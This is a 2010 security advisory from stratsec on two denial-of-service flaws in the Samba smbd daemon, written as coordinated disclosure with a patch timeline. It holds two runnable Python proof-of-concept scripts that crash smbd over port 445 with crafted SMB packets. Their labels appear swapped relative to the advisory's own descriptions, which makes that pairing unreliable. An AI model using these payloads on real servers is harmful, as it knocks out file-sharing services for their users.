209 lines
No EOL
8.4 KiB
Text
209 lines
No EOL
8.4 KiB
Text
===============================================================================
|
|
stratsec Security Advisory: SS-2010-005
|
|
===============================================================================
|
|
|
|
Title: Samba Multiple DoS Vulnerabilities
|
|
Version: 1.0
|
|
Issue type: Multiple
|
|
Affected vendor: Samba
|
|
Release date: 12/05/2010
|
|
Discovered by: Laurent Gaffié
|
|
Issue status: Patch available
|
|
|
|
===============================================================================
|
|
|
|
Summary
|
|
-------
|
|
|
|
Two vulnerabilities were discovered within in the Samba Smbd daemon which allow
|
|
an attacker to trigger a null pointer dereference or an uninitialized variable
|
|
read by sending a specific 'Sessions Setup AndX' query. Successful exploitation
|
|
of these issues will result in a denial of service.
|
|
|
|
Description
|
|
-----------
|
|
|
|
The Server Message Block (SMB) protocol, also known as Common Internet File
|
|
System (CIFS) acts as an application-layer protocol to provide shared access to
|
|
files, printers and Inter-Process Communication (IPC). It is also a transport
|
|
for Distributed Computing Environment / Remote Procedure Call (DCE / RPC)
|
|
operations. After negotiating an SMB communication the client sends a
|
|
'Session Setup AndX' packet to negotiate a session in order to be able to
|
|
connect on a specific share.
|
|
|
|
To trigger the null pointer dereference, the client needs to send a crafted SMB
|
|
'Negotiate Protocol' query with the SMB header 'Flags2' set to '0x0003'
|
|
(no Unicode), followed by a Session Setup AndX request with the SMB header
|
|
'Flags2' set to '0x8003' (Unicode). This sequence will result in a crash within
|
|
the Smbd process.
|
|
|
|
The uninitialised Variable Read issue, can be triggered if the client sends a
|
|
crafted 'Session Setup AndX' with a 'security blob length' value set to
|
|
'\xff\xff'.
|
|
|
|
Impact
|
|
------
|
|
|
|
A remote attacker can cause a denial of service within the Samba daemon
|
|
|
|
Affected products
|
|
-----------------
|
|
|
|
Samba <=3.4.7 and Samba <= 3.5.1
|
|
|
|
Proof of concept
|
|
----------------
|
|
|
|
To trigger the uninitialised variable read issue, the following Python
|
|
proof of concept is available:
|
|
|
|
import sys,socket
|
|
from socket import *
|
|
|
|
if len(sys.argv)<=1:
|
|
sys.exit('Usage: python smbd.py 10.0.0.12')
|
|
|
|
host = sys.argv[1],445
|
|
|
|
packetnego=(
|
|
"\x00\x00\x00\xaa"
|
|
"\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x03\x00\x00\x00\x00\x00"
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\xca\x00\x00\x00\x00"
|
|
"\x00\x87\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50"
|
|
"\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x1a\x45\x4e\x49"
|
|
"\x58\x20\x43\x4f\x52\x45\x00\x02\x4d\x49\x43\x52\x4f\x53\x4f\x46"
|
|
"\x54\x20\x4e\x45\x54\x57\x4f\x52\x4b\x53\x20\x31\x2e\x30\x33\x00"
|
|
"\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00\x02\x57\x69\x6e\x64"
|
|
"\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75"
|
|
"\x70\x73\x20\x33\x2e\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30"
|
|
"\x30\x32\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e"
|
|
"\x54\x20\x4c\x4d\x20\x76\x2e\x31\x32\x00"
|
|
)
|
|
|
|
payload=(
|
|
"\x00\x00\x01\xa3"
|
|
"\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x03\x80\x00\x00\x00\x00"
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
|
"\x00\x41\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
|
"\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\xca\x00\x00\x00"
|
|
"\x00\x0d\x75\x00\xd6\x00\x04\x11\x0a\x00\x00\x00\x00\x00\x00\x00"
|
|
"\x18\x00\x18\x00\x00\x00\x00\x00\xd4\x00\x00\x00\x99\x00\x36\xed"
|
|
"\x7f\xf4\x6b\xeb\x15\x65\x2e\xb5\xc9\x70\xbe\x39\xfa\x89\x56\x5b"
|
|
"\xb0\xc2\x56\x40\x11\x6c\xe6\x33\x1e\x93\x02\xd3\xd3\x2e\x17\xad"
|
|
"\x1f\x37\x23\xcf\x7e\x4c\xd7\x64\xbe\xd5\xdc\x1f\x23\xe0\x69\x41"
|
|
"\x00\x64\x00\x6d\x00\x69\x00\x6e\x00\x69\x00\x73\x00\x74\x00\x72"
|
|
"\x00\x61\x00\x74\x00\x65\x00\x75\x00\x72\x00\x00\x00\x4e\x00\x54"
|
|
"\x00\x34\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77"
|
|
"\x00\x73\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x31\x00\x33\x00\x38"
|
|
"\x00\x31\x00\x00\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f"
|
|
"\x00\x77\x00\x73\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x34\x00\x2e"
|
|
"\x00\x30\x00\x00\x00\x00\x00\x04\xff\x00\x00\x00\x00\x00\x01\x00"
|
|
"\x31\x00\x00\x5c\x00\x5c\x00\x31\x00\x39\x00\x32\x00\x2e\x00\x31"
|
|
"\x00\x36\x00\x38\x00\x2e\x00\x30\x00\x2e\x00\x31\x00\x30\x00\x34"
|
|
"\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f"
|
|
"\x3f\x3f\x00"
|
|
)
|
|
|
|
s = socket(AF_INET, SOCK_STREAM)
|
|
s.connect(host)
|
|
s.send(''.join(packetnego))
|
|
s.send(''.join(payload))
|
|
|
|
|
|
To trigger the null pointer dereference issue this Python proof of
|
|
concept is available:
|
|
|
|
import sys,socket
|
|
from socket import *
|
|
|
|
if len(sys.argv)<=1:
|
|
sys.exit('python smbd.py 10.0.0.12')
|
|
|
|
host = sys.argv[1],445
|
|
|
|
packetnego=(
|
|
"\x00\x00\x00\x85"
|
|
"\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x53\xc8\x00\x00\x00\x00"
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00"
|
|
"\x00\x62\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50"
|
|
"\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x4c\x41\x4e\x4d"
|
|
"\x41\x4e\x31\x2e\x30\x00\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66"
|
|
"\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e"
|
|
"\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
|
|
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c\x4d\x20"
|
|
"\x30\x2e\x31\x32\x00"
|
|
)
|
|
|
|
payload=(
|
|
"\x00\x00\x00\xec"
|
|
"\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00"
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x40\x00"
|
|
"\x0c\xff\x00\xec\x00\x04\x11\x32\x00\x00\x00\x00\x00\x00\x00"
|
|
"\xff\xff" ## Security blob set to \xff\xff here
|
|
"\x00\x00\x00\x00\xd4\x00\x00\xa0\xb1\x00\x60\x48\x06\x06\x2b"
|
|
"\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b"
|
|
"\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c"
|
|
"\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00"
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28"
|
|
"\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00"
|
|
"\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00"
|
|
"\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00"
|
|
"\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00"
|
|
"\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00"
|
|
"\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00"
|
|
"\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00"
|
|
)
|
|
s = socket(AF_INET, SOCK_STREAM)
|
|
s.connect(host)
|
|
s.send(''.join(packetnego))
|
|
s.send(''.join(payload))
|
|
|
|
Solution
|
|
--------
|
|
|
|
Update to version 3.5.2 or 3.4.8 (http://samba.org/)
|
|
|
|
Response timeline
|
|
-----------------
|
|
|
|
* 09/03/2010 - Null pointer dereference issue reported to vendor.
|
|
* 09/03/2010 - Vendor acknowledges receipt of advisory 2 hours after
|
|
receiving the initial email
|
|
* 09/03/2010 - Vendor confirms issue presence, and provide a patch 3
|
|
hours after receiving the initial email.
|
|
* 09/03/2010 - stratsec confirms patch resolves issue.
|
|
* 15/03/2010 - Uninitialised Variable Read issue reported to vendor.
|
|
* 15/03/2010 - Vendor confirms the issue and provides a patch 5 hours
|
|
after receiving the initial email.
|
|
* 15/03/2010 - stratsec confirms patch resolves issue
|
|
* 07/04/2010 - Version 3.5.2 released by the vendor fixing both issues.
|
|
* 11/05/2010 - Version 3.4.8 released by the vendor fixing both issues.
|
|
* 12/05/2010 - This advisory published.
|
|
|
|
References
|
|
----------
|
|
* Vendor advisory: http://samba.org/samba/history/samba-3.4.8.html
|
|
* https://bugzilla.samba.org/show_bug.cgi?id=7254
|
|
* stratsec would like to thanks the Samba Security Team for their
|
|
responsiveness while handling theses issues
|
|
|
|
===============================================================================
|
|
|
|
About stratsec
|
|
--------------
|
|
stratsec, specialises in providing information security consulting and testing
|
|
services for government and commercial clients. Established in 2004, we are
|
|
now one of the leading independent information security companies in the
|
|
Australasian and SE-Asian region, with offices throughout Australia and in
|
|
Singapore and Malaysia.
|
|
|
|
For more information, please visit our website at http://www.stratsec.net/
|
|
|
|
=============================================================================== |